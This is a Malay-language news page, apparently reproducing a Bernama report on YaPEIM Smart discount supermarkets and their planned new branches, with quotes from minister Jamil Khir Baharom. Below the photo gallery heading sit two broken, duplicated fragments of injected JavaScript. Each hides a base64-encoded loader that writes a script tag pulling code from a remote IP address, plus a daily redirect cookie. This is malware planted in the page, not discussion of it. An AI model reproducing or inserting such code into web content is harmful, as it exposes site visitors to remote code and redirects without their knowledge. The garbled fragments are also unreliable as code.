YaPEIM » Program Ihya’ Ramadhan dan Sumbangan Amal Jariah YaPEIM

Terkini

Program Ihya’ Ramadhan dan Sumbangan Amal Jariah YaPEIM

YaPEIM’s Mart akan membuka empat lagi rangkaian pasaraya menjelang akhir tahun dalam usaha menawarkan barangan pada harga lebih rendah

SUNGAI PETANI – Yayasan Pembangunan Ekonomi Islam Malaysia (Yapeim) Smart akan membuka empat lagi rangkaian pasar raya menjelang akhir tahun ini, dalam usaha menawarkan barangan pada harga yang lebih rendah kepada masyarakat setempat.

Menteri di Jabatan Perdana Menteri, Datuk Seri Jamil Khir Baharom berkata, cawangan pertama Yapeim Smart terletak di Batu 18, Guar Chempedak manakala cawangan kedua pula dibuka di Sungai Lalang, Sungai Petani.

“Kita telah berjaya dalam bidang gadaian Islam, iaitu Ar-Rahnu dengan hampir 200 cawangan, dan hari ini kita ceburi pula bidang yang dekat dengan masyarakat iaitu keperluan untuk menjadi rangkaian dan pembekal barangan makanan pada harga yang paling minimum.

“Empat lagi cawangan yang dijangka beroperasi tahun ini di Relau, Sungai Dua dan Permatang Gedong, di Pulau Pinang dan satu di Langgar, Alor Setar,” katanya selepas menghadiri Program Ihya’ Ramadan dan Sumbangan Amal Jariah YAPEIM di perkarangan Yapeim Smart Sungai Lalang, di sini, hari ini.

Jamil Khir berkata, keuntungan yang diperolehi Yapeim adalah minima kerana tujuan sebenar penubuhan pasar raya ini adalah untuk membantu golongan berpendapatan rendah dan sederhana mendapatkan barangan yang sama kualitinya dengan pasaran setempat, pada harga berpatutan.

“Kita mahu lihat Yapeim Smart ini sebagai satu gerakan yang berkembang maju untuk membekalkan barangan kepada rakyat pada harga yang murah.

“Dari segi barangan, kita mengambil produk yang berkualiti daripada SME (Perusahaan Kecil Sederhana), dikeluarkan oleh mereka dan mereka hantar terus kepada kita, tidak guna rangkaian orang tengah, kita ambil terus daripada pengilang dan pembekal,” katanya. – Bernama

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top